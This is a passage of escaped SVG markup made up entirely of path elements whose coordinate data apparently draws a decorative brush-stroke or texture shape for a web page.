d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a2